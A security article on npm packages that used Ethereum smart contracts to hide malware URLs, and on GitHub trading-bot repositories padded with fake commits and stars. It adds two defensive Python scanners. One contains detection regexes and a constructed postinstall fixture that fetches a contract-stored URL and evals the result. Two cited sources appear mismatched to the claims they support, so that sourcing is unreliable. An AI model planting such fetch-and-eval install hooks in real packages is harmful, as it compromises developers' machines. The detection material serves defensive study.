A novel and intricate attack technique has been discovered in which malicious actors use smart contracts on the Ethereum blockchain to conceal and distribute harmful software. The technique surfaced in two npm packages, colortoolsv2 and mimelib2, both uploaded to the npm registry around July 2025 and taken down once they were discovered. The malicious code in these packages uses smart contracts to store hidden web addresses (URLs) from which further malware components are fetched from a remote command and control (C2) server. This complicates detection because the harmful infrastructure is not included in the package itself but resides on the blockchain [1].

The campaign extends beyond the npm ecosystem and includes a well-orchestrated effort targeting GitHub repositories. Several repositories, such as solana-trading-bot-v2, ethereum-mev-bot-v2, and arbitrage-bot, appear to be legitimate cryptocurrency trading bots. However, researchers at ReversingLabs determined that this apparent legitimacy is largely fabricated. The repositories were filled with thousands of commits, many of them artificially generated, and were promoted by fake GitHub accounts that starred and forked them. These accounts were created around July 2025 and showed very little activity outside this campaign. Automated commit generation was also identified, consisting mostly of minor LICENSE file modifications, a clear attempt to inflate the repositories' perceived trustworthiness [2].

The malicious packages were pulled into these repositories as dependencies. The colortoolsv2 package was intentionally replaced with mimelib2 to avoid detection and keep the campaign active. Researchers also uncovered multiple user accounts connected to the campaign, including one named pasttimerles, which was responsible for a significant portion of the fake commits, and another, slunfuedrac, which added the malicious packages to the repositories' code [3].

Utilizing Ethereum smart contracts for malware delivery represents a relatively new development in the cybersecurity landscape. Unlike conventional malware distribution methods that embed malicious URLs directly within the package’s code, these packages use smart contracts to store those URLs and relevant commands. A similar tactic was observed back in 2023 with malicious Python packages that used GitHub Gists to host C2 URLs. The shift to using smart contracts signifies a notable evolution in techniques used to evade detection [4].
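The defining feature of the technique described above is the combination of behaviours rather than any single one: a dApp legitimately reads contract state, and plenty of packages fetch remote resources, but a package that reads a string from a contract, fetches whatever it points at and executes it (optionally from an install hook) has the shape of a loader. The following is an added example, not ReversingLabs' tooling and not the contents of colortoolsv2 or mimelib2, of a heuristic scanner for an unpacked npm package. The indicator regexes, the file-suffix list and the verdict rules are assumptions chosen for illustration, and the two fixtures are constructed.

```python
"""Heuristic scan of an unpacked npm package for a contract-resolved loader.

Added example (not ReversingLabs' tooling, not the real package contents):
it flags code that combines (a) reading data from an Ethereum contract,
(b) fetching a remote resource and (c) executing code dynamically, and
records install-time hooks declared in package.json. Indicator regexes
and the verdict rules are assumptions chosen for illustration.
"""
import json
import re

# Indicator categories. These regexes are illustrative assumptions, not a
# vetted signature set; tune them against real package corpora.
INDICATORS = {
    "eth_contract_read": re.compile(
        r"\beth_call\b"
        r"|require\(['\"](?:ethers|web3)['\"]\)"
        r"|from\s+['\"](?:ethers|web3)['\"]"
        r"|new\s+\w*\.?Contract\s*\("
    ),
    "remote_fetch": re.compile(r"\bfetch\s*\(|\bhttps?\.get\s*\(|\baxios\b"),
    "dynamic_exec": re.compile(
        r"\beval\s*\(|new\s+Function\s*\(|\bchild_process\b|vm\.runIn\w*Context"
    ),
}
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
CODE_SUFFIXES = (".js", ".mjs", ".cjs")


def scan_package(files):
    """files: mapping of relative path -> text content of the unpacked package.

    Returns which indicator categories fired (and in which files), the
    install hooks declared in package.json, and a one-line verdict.
    """
    hits = {name: [] for name in INDICATORS}
    hooks = []
    for path, text in files.items():
        if path.endswith("package.json"):
            try:
                scripts = json.loads(text).get("scripts", {})
            except json.JSONDecodeError:
                scripts = {}
            hooks.extend(k for k in INSTALL_HOOKS if k in scripts)
            continue
        if not path.endswith(CODE_SUFFIXES):
            continue
        for name, pattern in INDICATORS.items():
            if pattern.search(text):
                hits[name].append(path)
    seen = {name for name, paths in hits.items() if paths}
    # The combination matters: a dApp legitimately reads contracts, and many
    # packages fetch things; contract read + fetch/exec is the loader shape.
    if "eth_contract_read" in seen and seen & {"remote_fetch", "dynamic_exec"}:
        verdict = "suspicious: contract-resolved loader pattern"
        if hooks:
            verdict += " (runs at install time)"
    elif hooks and "dynamic_exec" in seen:
        verdict = "review: install hook with dynamic execution"
    else:
        verdict = "no loader pattern found"
    return {"hits": hits, "install_hooks": hooks, "verdict": verdict}


# Constructed fixtures: a benign contract reader and a toy loader shaped like
# the technique described above. Neither is the real colortoolsv2/mimelib2 code.
BENIGN_DAPP = {
    "package.json": json.dumps({"name": "balance-reader",
                                "scripts": {"test": "node test.js"}}),
    "index.js": (
        "const { ethers } = require('ethers');\n"
        "async function balance(contract, addr) { return contract.balanceOf(addr); }\n"
        "module.exports = { balance };\n"
    ),
}
SUSPECT_LOADER = {
    "package.json": json.dumps({"name": "colour-helper",
                                "scripts": {"postinstall": "node setup.js"}}),
    "setup.js": (
        "const { ethers } = require('ethers');\n"
        "async function stage(contract) {\n"
        "  const target = await contract.getUrl();   // URL lives on-chain\n"
        "  const body = await (await fetch(target)).text();\n"
        "  eval(body);\n"
        "}\n"
    ),
}

if __name__ == "__main__":
    for label, pkg in (("benign", BENIGN_DAPP), ("suspect", SUSPECT_LOADER)):
        print(label, scan_package(pkg)["verdict"])
```

The benign fixture trips only the contract-read indicator and is reported clean, while the constructed loader trips all three and is escalated further because it is wired to a postinstall hook. In practice the scanner would be run over the extracted tarball of every new dependency version before it is allowed into a lockfile, and the regexes would be maintained against a corpus of known-good packages to keep the false-positive rate acceptable.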

This campaign forms part of a larger trend of supply chain attacks specifically targeting cryptocurrency developers. According to the ReversingLabs 2025 Software Supply Chain Security report, there were 23 similar attacks in 2024, including the compromise of the PyPI package ultralytics, which delivered a cryptocurrency mining program. The use of open-source repositories as a channel to distribute malware highlights the critical need for developers to carefully assess the trustworthiness and integrity of any third-party packages they use. This evaluation should extend beyond the package itself, also scrutinizing its maintainers and the broader ecosystem in which it exists [5].

Based on these findings, ReversingLabs recommends that developers implement a more thorough vetting process for open-source packages. This should involve carefully analyzing the history of the package, verifying the credibility of its maintainers, and examining the overall activity within the associated repositories. The company has also developed tools such as Spectra Assure Community to aid in assessing the security posture of open-source packages. Due to the increasing sophistication of supply chain attacks, developers and organizations must remain alert and adapt their security approaches to effectively address these evolving threats [6].
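The signals named in the GitHub part of this campaign (commit histories padded with LICENSE-only changes, a single account producing most of the history, stars from accounts created around the same time with almost no other activity) can be turned into concrete checks that fit the vetting process recommended above. The following is an added example, not ReversingLabs' Spectra Assure or any other real tool. It consumes two simplified record shapes assumed for this example, which mirror information one would collect from repository metadata rather than any real API schema: commit records with an author and the files touched, and stargazer records with an account creation date and a public activity count. The thresholds and both fixture repositories are constructed.

```python
"""Heuristics for spotting an artificially inflated GitHub repository.

Added example, not ReversingLabs' Spectra Assure or any other real tool.
Record shapes are assumptions for this example: commits are
{"author": str, "files": [str]}, stargazers are
{"login": str, "created": date, "public_events": int}. Thresholds are
illustrative and should be calibrated on real repositories.
"""
from collections import Counter
from datetime import date, timedelta

REF_DATE = date(2025, 9, 1)  # constructed "date of review"


def license_only_ratio(commits):
    """Share of commits whose only changed files are LICENSE files."""
    if not commits:
        return 0.0
    padded = sum(
        1 for c in commits
        if c["files"] and all(f.upper().startswith("LICENSE") for f in c["files"])
    )
    return padded / len(commits)


def author_concentration(commits):
    """Largest share of commits attributable to a single account."""
    if not commits:
        return 0.0
    counts = Counter(c["author"] for c in commits)
    return max(counts.values()) / len(commits)


def young_idle_stargazer_ratio(stargazers, ref_date, max_age_days=90, min_events=5):
    """Share of stargazers whose account is both recent and otherwise inactive."""
    if not stargazers:
        return 0.0
    young_idle = sum(
        1 for s in stargazers
        if (ref_date - s["created"]).days <= max_age_days
        and s["public_events"] < min_events
    )
    return young_idle / len(stargazers)


def assess_repo(commits, stargazers, ref_date):
    """Combine the signals into flags a reviewer can act on."""
    signals = {
        "license_only_ratio": license_only_ratio(commits),
        "author_concentration": author_concentration(commits),
        "young_idle_stargazer_ratio": young_idle_stargazer_ratio(stargazers, ref_date),
    }
    flags = []
    if signals["license_only_ratio"] > 0.5:
        flags.append("commit padding: most commits only touch LICENSE")
    if len(commits) >= 100 and signals["author_concentration"] > 0.8:
        flags.append("commit flood: one account made over 80% of a large history")
    if signals["young_idle_stargazer_ratio"] > 0.5:
        flags.append("star padding: most stargazers are new, inactive accounts")
    return {"signals": signals, "flags": flags}


# Constructed fixtures (not real repositories or accounts).
def inflated_repo():
    commits = [{"author": "padder-1", "files": ["LICENSE"]} for _ in range(200)]
    commits += [{"author": "dev-a", "files": ["src/index.js"]} for _ in range(20)]
    july = date(2025, 7, 1)
    stargazers = [{"login": f"fan-{i}", "created": july + timedelta(days=i % 20),
                   "public_events": i % 3} for i in range(30)]
    stargazers += [{"login": f"old-{i}", "created": date(2021, 3, 9),
                    "public_events": 400} for i in range(5)]
    return commits, stargazers


def healthy_repo():
    commits = [{"author": ["dev-a", "dev-b", "dev-c"][i % 3],
                "files": [f"src/mod{i % 7}.js"]} for i in range(40)]
    stargazers = [{"login": f"user-{i}", "created": date(2019, 5, 4),
                   "public_events": 120} for i in range(10)]
    return commits, stargazers


if __name__ == "__main__":
    for name, repo in (("inflated", inflated_repo()), ("healthy", healthy_repo())):
        print(name, assess_repo(*repo, REF_DATE)["flags"])
```

The inflated fixture raises all three flags and the healthy one none. None of these signals is conclusive on its own (a solo maintainer legitimately dominates a small repository, and a popular new project attracts new accounts), which is why the checks are reported as separate flags for a human to weigh alongside the package's own history and maintainer identity rather than collapsed into a single score.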

Sources:
[1] Ethereum Contracts Used to Hide Malicious Code (https://www.reversinglabs.com/blog/ethereum-contracts-malicious-code)
[2] Malicious npm Packages Exploit Ethereum Smart Contracts (https://thehackernews.com/2025/09/malicious-npm-packages-exploit-ethereum.html)
[3] Malicious npm Packages Exploit Ethereum Smart Contracts (https://www.infosecurity-magazine.com/news/malicious-npm-packages-exploit/)
[4] Malicious npm Packages Use Ethereum Blockchain for Malware Delivery (https://www.csoonline.com/article/4050956/malicious-npm-packages-use-ethereum-blockchain-for-malware-delivery.html)
[5] Trump’s Crypto Project Under Attack (https://finance.yahoo.com/news/trump-crypto-project-wlfi-under-081337737.html)
[6] BunniXYZ Ethereum Exchange Suffers $2.3M Breach (https://www.mitrade.com/insights/news/live-news/article-3-1087725-20250902)